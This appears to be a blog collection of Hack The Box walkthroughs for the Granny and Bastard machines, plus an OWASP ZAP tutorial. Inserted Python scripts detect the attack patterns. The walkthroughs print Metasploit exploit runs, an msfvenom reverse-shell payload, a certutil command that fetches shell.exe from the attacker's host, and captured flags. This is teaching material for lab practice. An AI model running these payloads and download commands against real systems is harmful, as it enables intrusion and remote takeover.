Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)              | exploits/windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service                                              | exploits/windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service                     | exploits/windows/dos/22670.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure                            | exploits/windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                  | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                               | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                               | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                             | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                           | exploits/windows/remote/8754.patch
------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

root@kali:~# 

We can exploit the vulnerability with Metasploit in the following way.
Now we have a shell as the user “nt authority\network service”.
However, at this point, it is not possible to read “user.txt”.

msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl 
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.36:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (180291 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.10.14:1031) at 2020-01-11 15:49:29 +0200

meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2112 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\Documents and settings>whoami
whoami
nt authority\network service

c:\Documents and settings>

3. Getting Root

Since “nt authority\network service” has fewer permissions than an ordinary user, we cannot use some common commands here.

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

meterpreter > 

Before getting a SYSTEM shell, we need to move into another process with better permissions.
This time, we can migrate to the process “notepad.exe”.

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 272   4     smss.exe                                                        
 324   272   csrss.exe                                                       
 348   272   winlogon.exe                                                    
 396   348   services.exe                                                    
 400   616   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 408   348   lsass.exe                                                       
 616   396   svchost.exe                                                     
 684   396   svchost.exe                                                     
 740   396   svchost.exe                                                     
 768   396   svchost.exe                                                     
 804   396   svchost.exe                                                     
 940   396   spoolsv.exe                                                     
 968   396   msdtc.exe                                                       
 1080  396   cisvc.exe                                                       
 1124  396   svchost.exe                                                     
 1132  1080  cidaemon.exe                                                    
 1184  396   inetinfo.exe                                                    
 1220  396   svchost.exe                                                     
 1332  396   VGAuthService.exe                                               
 1412  396   vmtoolsd.exe                                                    
 1460  396   svchost.exe                                                     
 1600  396   svchost.exe                                                     
 1708  396   alg.exe                                                         
 1816  616   wmiprvse.exe       x86   0                                      \Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe
 1920  396   dllhost.exe                                                     
 2180  1460  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2248  616   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2328  1080  cidaemon.exe                                                    
 2356  1080  cidaemon.exe                                                    
 2492  616   wmiprvse.exe                                                    
 2872  1816  notepad.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\notepad.exe
 2972  348   logon.scr                                                       
 3560  1460  w3wp.exe                                                        
 3744  2180  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe

meterpreter > migrate 2872
[*] Migrating from 3744 to 2872...
[*] Migration completed successfully.

meterpreter >
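
A process listing like the one above is also what a defender looks at when hunting for this kind of foothold: an IIS worker process (w3wp.exe) normally has no descendants, and an interactive application such as notepad.exe has no business running as a service account. The following Python script is an added example and not part of the original walkthrough; it parses a constructed listing modelled on the `ps` output above (the column layout PID, PPID, name, arch, session, user, path is assumed from that output) and flags both patterns.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample modelled on the `ps` listing above; columns are
# PID, PPID, name and optionally arch, session, user, path. Not a real capture.
SAMPLE_PS = r"""
 616   396   svchost.exe
 1460  396   svchost.exe
 1816  616   wmiprvse.exe       x86   0                                      \Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe
 2180  1460  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2872  1816  notepad.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\notepad.exe
 3744  2180  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
"""

# Accounts under which an interactive desktop application should never run.
SERVICE_ACCOUNTS = {
    r"nt authority\system",
    r"nt authority\network service",
    r"nt authority\local service",
}
WEB_WORKERS = {"w3wp.exe"}                                   # IIS worker processes
INTERACTIVE_APPS = {"notepad.exe", "calc.exe", "mspaint.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    user: str = ""
    path: str = ""


def parse_ps(text: str) -> Dict[int, Proc]:
    """Parse the fixed-width listing; columns are separated by two or more spaces."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines():
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) < 3 or not fields[0].isdigit():
            continue
        pid, ppid, name = int(fields[0]), int(fields[1]), fields[2].lower()
        rest = fields[3:]        # [arch, session, user, path] or [arch, session, path]
        user = path = ""
        if len(rest) >= 4:
            user, path = rest[2], rest[3]
        elif len(rest) == 3:
            path = rest[2]       # user column was empty for this process
        procs[pid] = Proc(pid, ppid, name, user, path)
    return procs


def ancestors(procs: Dict[int, Proc], pid: int) -> List[Proc]:
    """Walk the parent chain; stops at unknown PIDs and guards against cycles."""
    chain: List[Proc] = []
    seen = {pid}
    p = procs.get(pid)
    while p is not None and p.ppid in procs and p.ppid not in seen:
        seen.add(p.ppid)
        p = procs[p.ppid]
        chain.append(p)
    return chain


def find_anomalies(procs: Dict[int, Proc]) -> List[str]:
    """Return one finding per process that matches a suspicious pattern."""
    findings: List[str] = []
    for p in sorted(procs.values(), key=lambda x: x.pid):
        web_parent = next((a for a in ancestors(procs, p.pid) if a.name in WEB_WORKERS), None)
        if web_parent is not None:
            findings.append(f"{p.pid} {p.name}: descends from IIS worker {web_parent.pid} {web_parent.name}")
        if p.name in INTERACTIVE_APPS and p.user.lower() in SERVICE_ACCOUNTS:
            findings.append(f"{p.pid} {p.name}: interactive application running as {p.user}")
    return findings


if __name__ == "__main__":
    for finding in find_anomalies(parse_ps(SAMPLE_PS)):
        print(finding)
```

On the sample the script reports rundll32.exe (PID 3744) as a descendant of w3wp.exe and notepad.exe (PID 2872) as an interactive program running as NETWORK SERVICE, which is exactly the pair of processes the migration above moved between. Real telemetry would come from Sysmon or EDR process-creation events rather than a meterpreter listing, but the parent-child rules are the same.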

To find a local privilege escalation vulnerability, we can use the Metasploit module “local_exploit_suggester”.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) >

This time, we can use the kernel exploit “MS14-070”.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl 
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.52.0.73:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter >

root.txt is in the directory “C:\Documents and Settings\Administrator\Desktop”.

meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop

meterpreter > cat root.txt
9359e905a2c35f861f6a57cecf28bb7b

meterpreter > 

Hackthebox Bastard Walkthrough


Retired date: 2017/09/17

Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Bastard”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.9 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-10 17:29 EET
Nmap scan report for 10.10.10.9
Host is up (0.044s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.57 seconds

root@kali:~#

2. Getting User

By accessing the web server, we can see that the website is running the Drupal CMS.

First, to figure out its version, look at the file “CHANGELOG.txt”.
The version is “Drupal 7.54”.

root@kali:~# curl -s http://10.10.10.9/CHANGELOG.txt | head

Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served

root@kali:~# 

Since we found the version of Drupal, take a look at the public exploits.

root@kali:~# searchsploit drupal 7
------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                               |  Path
                                                                                                             | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                  | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                | exploits/php/webapps/27020.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                            | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                             | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                  | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                  | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                     | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                       | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                           | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                      | exploits/php/webapps/3313.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                            | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                     | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                  | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                          | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                       | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                      | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                               | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                            | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                            | exploits/php/webapps/44501.txt
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

root@kali:~# 

By searching the web for the CVE, we can find the exploit for “CVE-2018-7600”.
First, we have to install the prerequisites.

root@kali:~# pip install requests

---

root@kali:~# pip install bs4

---

Then, execute the Python script as follows.
We get RCE, and the username is “iusr”.

root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-zOmyPneEf5iyoz3yKt8zu5m59kxdtrcNPWZ1eaYNM7s
[*] Triggering exploit to execute: whoami
nt authority\iusr

root@kali:~/CVE-2018-7600# 

Next, to obtain a reverse shell, generate a payload with msfvenom.

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.36 LPORT=1338 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
root@kali:~#

To upload the payload “shell.exe”, run a web server on the attacking machine.

root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

Next, let the server download our “shell.exe” in the following way.

root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "certutil.exe -urlcache -split -f http://10.10.14.36:8000/shell.exe shell.exe" http://10.10.10.9
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-eluco1rRs3Likgl6whfexWXJUfBv18WMnuEcvVUc-hw
[*] Triggering exploit to execute: certutil.exe -urlcache -split -f http://10.10.14.36:8000/shell.exe shell.exe
****  Online  ****
  0000  ...
  1c00
CertUtil: -URLCache command completed successfully.

root@kali:~/CVE-2018-7600#
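
From the defender's side, certutil.exe fetching a URL with -urlcache is a well-known living-off-the-land pattern, and it is even more suspicious when the parent process is the IIS worker w3wp.exe, as it would be in this case. The following Python script is an added example and not part of the page: it runs a small rule over constructed process-creation events in a “timestamp|parent image|image|command line” format (a layout chosen for the sample; real telemetry such as Sysmon event ID 1 carries the same fields) and grades each hit.

```python
import re
from typing import Dict, List

# Constructed process-creation events, "timestamp|parent image|image|command line".
# Not real telemetry; the first line mirrors the certutil command shown above.
SAMPLE_EVENTS = r"""
2020-01-11T00:35:02|w3wp.exe|certutil.exe|certutil.exe -urlcache -split -f http://10.10.14.36:8000/shell.exe shell.exe
2020-01-11T00:36:10|cmd.exe|certutil.exe|certutil.exe -hashfile C:\Windows\notepad.exe SHA256
2020-01-11T00:37:44|explorer.exe|certutil.exe|CertUtil -URLCache -f https://example.test/update.bin update.bin
2020-01-11T00:38:01|cmd.exe|certutil.exe|certutil -decode C:\temp\blob.b64 C:\temp\blob.exe
2020-01-11T00:39:15|services.exe|svchost.exe|C:\Windows\system32\svchost.exe -k netsvcs
"""

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Parents that have no legitimate reason to launch certutil: web server workers
# and office applications, the usual hosts of a web shell or macro foothold.
SUSPICIOUS_PARENTS = {"w3wp.exe", "winword.exe", "excel.exe"}


def classify(parent: str, command: str) -> Dict[str, str]:
    """Return a finding for an abusive certutil command line, or {} when it looks benign."""
    args = command.lower()
    url = URL_RE.search(command)
    if "-urlcache" in args and url:
        severity = "high" if parent.lower() in SUSPICIOUS_PARENTS else "medium"
        return {"rule": "certutil download", "severity": severity, "url": url.group(0)}
    if "-decode" in args:
        # Base64 decoding of a dropped file is the other common abuse of certutil.
        return {"rule": "certutil base64 decode", "severity": "low", "url": ""}
    return {}


def detect(events: str) -> List[Dict[str, str]]:
    """Apply classify() to every certutil.exe event in the constructed log."""
    findings: List[Dict[str, str]] = []
    for line in events.strip().splitlines():
        timestamp, parent, image, command = line.split("|", 3)
        if image.lower() != "certutil.exe":
            continue
        finding = classify(parent, command)
        if finding:
            findings.append({"time": timestamp, "parent": parent, **finding})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["time"], f["parent"], f["rule"], f["url"])
```

The hash-file invocation is left alone, the download parented by w3wp.exe is graded high, the same download from explorer.exe only medium, and the decode case low; a production rule would add the user context and the destination path, but the parent-process check is what separates this event from ordinary administrative use.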

After that, set a handler for the meterpreter shell.

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 10.10.14.36
lhost => 10.10.14.36

msf5 exploit(multi/handler) > set lport 1338
lport => 1338

msf5 exploit(multi/handler) > run

Finally, run the following command to execute the remote “shell.exe”.

root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "shell.exe" http://10.10.10.9
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-3CDbNQWCSlC7U8JT4zNX52Lhbp3Kyc3txDmOtm_2Cxk
[*] Triggering exploit to execute: shell.exe

Now we have a reverse shell as the user “NT AUTHORITY\IUSR”.

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.36:1338 
[*] Sending stage (206403 bytes) to 10.10.10.9
[*] Meterpreter session 1 opened (10.10.14.36:1338 -> 10.10.10.9:49242) at 2020-01-11 00:39:37 +0200

meterpreter > getuid
Server username: NT AUTHORITY\IUSR
meterpreter >

“user.txt” is in the directory “C:\Users\dimitris\Desktop”.

meterpreter > pwd
C:\users\dimitris\desktop

meterpreter > cat ./user.txt
ba22fde1932d06eb76a163d312f921a2

meterpreter >

3. Getting Root

By running “systeminfo”, we can see that this server is Windows Server 2008 R2 without any hotfixes.
This means that the OS is a fresh install and has never been updated.

C:\Users\Administrator\Desktop>systeminfo
systeminfo
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          11/1/2020, 1:15:17 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.565 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.578 MB
Virtual Memory: In Use:    517 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
C:\Users\Administrator\Desktop>
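
The systeminfo output is a quick patch-state check in either role: for the attacker it points at kernel exploits, for an administrator it is a one-line audit of whether a host has ever been updated. The Python script below is an added example, not the page's code: it parses the “Key: value” lines from a trimmed copy of the output above, collects the indented “[nn]:” item lines that systeminfo prints under Hotfix(s) when updates are installed (the second sample is constructed, with placeholder KB numbers), and reports whether the host is unpatched.

```python
import re
from typing import Dict, List

# Trimmed copy of the systeminfo output shown above (locale time markers omitted).
SAMPLE_SYSTEMINFO = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Original Install Date:     18/3/2017, 7:04:46
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed counter-example in the layout systeminfo uses when hotfixes exist;
# the host name and KB numbers are placeholders, not real values.
PATCHED_SAMPLE = """\
Host Name:                 PLACEHOLDER-HOST
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
"""

KEY_VALUE = re.compile(r"^(?P<key>[^:\n]+?):\s*(?P<value>.*)$")
ITEM = re.compile(r"^\s+\[\d+\]:\s*(?P<item>.+?)\s*$")


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Collect 'Key: value' pairs; indented '[nn]: item' lines attach to the preceding key."""
    info: Dict[str, object] = {}
    current = None
    for line in text.splitlines():
        item = ITEM.match(line)
        if item and current is not None:
            info.setdefault(current + " items", []).append(item.group("item"))
            continue
        kv = KEY_VALUE.match(line)
        if kv and not line.startswith(" "):      # continuation lines are indented
            current = kv.group("key").strip()
            info[current] = kv.group("value").strip()
    return info


def installed_hotfixes(info: Dict[str, object]) -> List[str]:
    """KB identifiers listed under Hotfix(s); empty when the line reads N/A."""
    items = info.get("Hotfix(s) items", [])
    return [i for i in items if re.fullmatch(r"KB\d+", i)]


def patch_state(text: str) -> Dict[str, object]:
    """Summarise OS build and hotfix status for one systeminfo dump."""
    info = parse_systeminfo(text)
    hotfixes = installed_hotfixes(info)
    hotfix_line = str(info.get("Hotfix(s)", "")).strip().upper()
    return {
        "host": info.get("Host Name"),
        "os": info.get("OS Name"),
        "build": info.get("OS Version"),
        "hotfixes": hotfixes,
        "never_patched": hotfix_line == "N/A" and not hotfixes,
    }


if __name__ == "__main__":
    for dump in (SAMPLE_SYSTEMINFO, PATCHED_SAMPLE):
        print(patch_state(dump))
```

The same parser handles the other multi-valued keys (Processor(s), Network Card(s)) because the “[nn]:” items are attached to whichever key preceded them, so it can be reused to inventory NICs or CPUs from the same dump.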

This time, “MS15-051” was used to get a SYSTEM shell.

msf5 exploit(multi/handler) > use exploit/windows/local/ms15_051_client_copy_image 

msf5 exploit(windows/local/ms15_051_client_copy_image) > set session 1
session => 1

msf5 exploit(windows/local/ms15_051_client_copy_image) > set target 1
target => 1

msf5 exploit(windows/local/ms15_051_client_copy_image) > set lhost 10.10.14.36
lhost => 10.10.14.36

msf5 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.14.36:4444 
[*] Launching notepad to host the exploit...
[+] Process 2052 launched.
[*] Reflectively injecting the exploit DLL into 2052...
[*] Injecting exploit into 2052...
[*] Exploit injected. Injecting payload into 2052...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 2 opened (10.10.14.36:4444 -> 10.10.10.9:49182) at 2020-01-11 01:17:57 +0200

whoami
whoami
nt authority\system

C:\inetpub\drupal-7.54>

root.txt is in the directory “C:\Users\Administrator\Desktop”.

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c

C:\Users\Administrator\Desktop>

Running OWASP ZAP on Kali Linux 2019.4


Explanation

OWASP ZAP is a web vulnerability scanner that is one of the OWASP projects.

Environment

  • OS: Kali linux 2019.4
  • OWASP ZAP: v2.8.1
  • Target: OWASP Juice shop v9.3.1

Solution

1. Initial setup

Since it’s in the official Kali repository, we only need “apt-get”.

root@kali:~# apt-get install zaproxy

Next, launch the target application.
This time, I used OWASP Juice shop with Vagrant and IP “192.168.33.10” was assigned.

root@kali:~# git clone https://github.com/bkimminich/juice-shop.git

---

root@kali:~# cd juice-shop/vagrant/

root@kali:~/juice-shop/vagrant# vagrant up

---

After that, give OWASP Juice Shop a hostname.
This time, add the following line to “/etc/hosts”.

192.168.33.10 juiceshop

2. Other setup

At first, open the ZAP GUI console.

Go to “Tools” -> “Options” -> “Local Proxies”.
By default, it is configured to use “http://localhost:8080”.
We have to configure the web browser to use a proxy on port 8080.

Then, change the mode to “Protected mode” so that we do not attack unintended targets.
If we select “Protected mode”, we have to specify the target URL.

The web browser we use should be Firefox, because it does not have any XSS protection.
However, this time, Google Chrome was used.

If the configuration is correct, we can find the target URL in the “Site” section.
This means we can now go to the next step.

Since we’re using protected mode, we have to include the site in a “context”.
Right click the site, then go to “Include in Context”.
This time, we don’t have any context yet, so click “New Context” and a dialog window appears.
Click “OK”.

After that, we can see that some entries have been added to the site.

3. Active scanning

Now we have a target machine.
Start the attack by right clicking “http://juiceshop” -> “Attack” -> “Active Scan”.
We can confirm on the “Active Scan” tab that a large number of HTTP requests are being sent.

After the scan finishes, we can find some security alerts on the “Alerts” tab.

4. Saving the session

We can save the current session data by going to “Snapshot Session As…”.

5. Generate a report

We can create a report of each test as an HTML or XML file.
Go to “Report” -> “Generate HTML Report…”.

6. Next task

This time, I could not find some of the vulnerabilities that OWASP Juice Shop has.
Next time, try to focus on each vulnerability and achieve this purpose by customizing the scan policies.